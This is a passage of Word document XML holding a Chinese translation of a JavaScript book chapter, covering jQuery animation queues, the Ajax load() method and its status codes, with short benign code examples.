        <w:t>我们知道，通过给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画方法传入回调函数，就可以在动画完成后执行</w:t>
      </w:r>
      <w:r>
        <w:t>一些操作。通过对函数执行队列操作，也可达到这一目的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>淡入显示一个元素，稍等片刻，设置一些文字，然后变化边框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#message").fadeIn().delay(200).queue(function(next){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(this).text("Hello World");//</w:t>
      </w:r>
      <w:r>
        <w:t>显示一些文字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>next();//</w:t>
      </w:r>
      <w:r>
        <w:t>运行队列中的下一项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}).animate({borderWidth:"+=10px;"});//</w:t>
      </w:r>
      <w:r>
        <w:t>将边框变粗</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>队列函数中的回调函数参数是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>引入的新特性。对于</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库之</w:t>
      </w:r>
      <w:r>
        <w:t>前的版本，需要调用</w:t>
      </w:r>
      <w:r>
        <w:t>dequeue()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>手动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>取消队列中的下一个函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(this).dequeue();//</w:t>
      </w:r>
      <w:r>
        <w:t>替代</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果在队列中什么也没有，调用</w:t>
      </w:r>
      <w:r>
        <w:t>dequeue()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不会有任何响应。反之，它则会将队列头部的函数从队列中移除，并调用它，设置的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值和传入的回调函数如上所述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>还有一些笨拙的方式来操作队列。</w:t>
      </w:r>
      <w:r>
        <w:t>clearQueue()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来清除队列。给</w:t>
      </w:r>
      <w:r>
        <w:t>queue()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入一个函数组成的数组而不是单一函数时，会用传入的函数数组来替换当前队列。如果在调用</w:t>
      </w:r>
      <w:r>
        <w:t>queue()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，不传入任何参数，则会返回当前队列数组。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>还将</w:t>
      </w:r>
      <w:r>
        <w:t>queue()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>dequeue()</w:t>
      </w:r>
      <w:r>
        <w:t>定义成了工具函数。如果想给元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的队列添加一个函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，可以使用以下方法或函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(e).queue(f);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个持有</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并调用</w:t>
      </w:r>
      <w:r>
        <w:t>queue()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.queue(e,f);//</w:t>
      </w:r>
      <w:r>
        <w:t>直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>jQ</w:t>
      </w:r>
      <w:r>
        <w:t>uery.queue()</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最后，留意下</w:t>
      </w:r>
      <w:r>
        <w:t>queue()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>dequeue()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clearQueue()</w:t>
      </w:r>
      <w:r>
        <w:t>方法都可以有一个可选的队列名来作为第一个参数。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画方法使用的队列名是</w:t>
      </w:r>
      <w:r>
        <w:t>"fx"</w:t>
      </w:r>
      <w:r>
        <w:t>，这是没有指定队列名时默认使用的队列。当想要顺序执行异步操作时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>队列机制非常有用：原来需要给每一个异步操作传入回调函数来触发队列中的下一个函数，现在可以直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>队列来管理异步序列。只须传入非</w:t>
      </w:r>
      <w:r>
        <w:t>"fx"</w:t>
      </w:r>
      <w:r>
        <w:t>的队列名，并记得队列中的函数不会自动执行。必须显式调用</w:t>
      </w:r>
      <w:r>
        <w:t>dequeue()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来运行第一个函数，</w:t>
      </w:r>
      <w:r>
        <w:t>然后每一步操作在完成时必须把下一个操作从队列中移出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="491" w:name="19_6_jQueryZhong_De_Ajax"/>
      <w:r>
        <w:t>19.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:bookmarkEnd w:id="491"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用编程技术里，</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>很流行，它使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>脚本（参考第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章）来按需加载数据，而不需要刷新整个页面。在现代</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用中，</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>技术非常有用，因此</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>内置了</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具来简化使用。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个高级工具方法和四个高级工具函数。这些高级工具都基于同一个强大的底层函数：</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>。下面的章节会首先描述这些高级工具，然后再详细阐述</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。为了彻底理解高级工具</w:t>
      </w:r>
      <w:r>
        <w:t>的使用，我们需要理解</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>，即便可能永远不用显式使用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="492" w:name="19_6_1_load__Fang_Fa_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>19.6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="492"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>是所有</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>工具中最简单的：向它传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，它会异步加载该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容，然后将内容插入每一个选中元素中，替换掉已经存在的任何内容。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每隔</w:t>
      </w:r>
      <w:r>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:t>秒加载并显示最新的状态报告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setInterval(function(){$('#status').load("status_report.html");},60000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>19.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节也讲到了</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它用来注册</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>oad</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序。如果传给该方法的第一个参数是函数而不是字符串，则</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是事件处理程序注册方法而不是</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>方法。如果只想显示被加载文档的一部分，可以在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>后面添加一个空格和一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器。当</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>加载完成后，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会用指定的选择器来从加载好的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中选取需要显示的部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>加载并显示天气预告的温度部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#temp').load("wheather_report.html#temperature");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意：</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>后面的选择器看起来很像片断标识符（</w:t>
      </w:r>
      <w:r>
        <w:t>14.2</w:t>
      </w:r>
      <w:r>
        <w:t>节讲述的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>部分）。不同的是，如果想只插入被加载文档的选中部分的话，则空格是必需的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>除了必须的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>参数，</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还接受两个可选参数。第一个可选参数表示的数据，可以追加到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>后面，或者与请求一起发送。如果传入的是字符串，则会追加到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>后面（放在</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>后面）。如果传入对象，该对象会被转化为一个用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>分隔的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对后与请求一起发送。（对象转化为字符串的具体细节在</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>"2.jQuery.getJSON()"</w:t>
      </w:r>
      <w:r>
        <w:t>节中描述。）通常情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法发送</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
      <w:r>
        <w:t>，但是如果传入数据对象，则它会发送</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求。下面是两个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>加载特定区号的天气预报</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#temp').load("us_weather_report.html","zipcode=02134");//</w:t>
      </w:r>
      <w:r>
        <w:t>使用对象作为数据，并指定为华氏温度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('#temp').load("us_weather_report.html",{zipcode:02134,units:'F'});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的另一个可选参数是回调函数。当</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求成功或未成功，以及（当请求成功时）</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>加载完毕并插入选中元素时，会调用该回调函数。如果没有指定任何数据，回调函数可以作为第二个参数传入。否则，它必须是第三个参数。在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的每一个元素上都会调用回调函数，并且每次调用都会传入三个参数：被加载</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的完整文本内容、状态码字符串，以及用来加载该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>XM</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>LHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象。其中，状态参数是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的状态码，不是</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的状态码，其值是类似</w:t>
      </w:r>
      <w:r>
        <w:t>"success"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"error"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"ti</w:t>
      </w:r>
      <w:r>
        <w:t>meout"</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>状态码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的所有</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具，包括</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，会调用回调函数来提供请求成功或失败的异步消息。这些回调函数的第二个参数是一个字符串，可以取以下值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"success"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示请求成功完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"notmodified"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该状态码表示请求已正常完成，但服务器返回的响应内容是</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP 304"Not Modified"</w:t>
      </w:r>
      <w:r>
        <w:t>，表示请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>内容和上次请求的相同，没有变化。只有在选项中设置</w:t>
      </w:r>
      <w:r>
        <w:t>ifModified</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>时，该状态码才会出现（参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节下面</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>“1.</w:t>
      </w:r>
      <w:r>
        <w:t>通用选项</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>认为</w:t>
      </w:r>
      <w:r>
        <w:t>"notmodified"</w:t>
      </w:r>
      <w:r>
        <w:t>状态码是成功的，但之前的版本会将其当成错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"error"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>表示请求没有成功完成，原因是某些</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>错误。更多细节，可以检查传入每一个回调函数中的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>状态码来获取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"timout"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求没有在选定的超时区间内完成，会调用错误回调，并传入该状态码。默认情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求没有超时限定，只有指定了</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>选项（见</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“1.</w:t>
      </w:r>
      <w:r>
        <w:t>通用选项</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>节）时才能看到该状态码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"parsererror"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
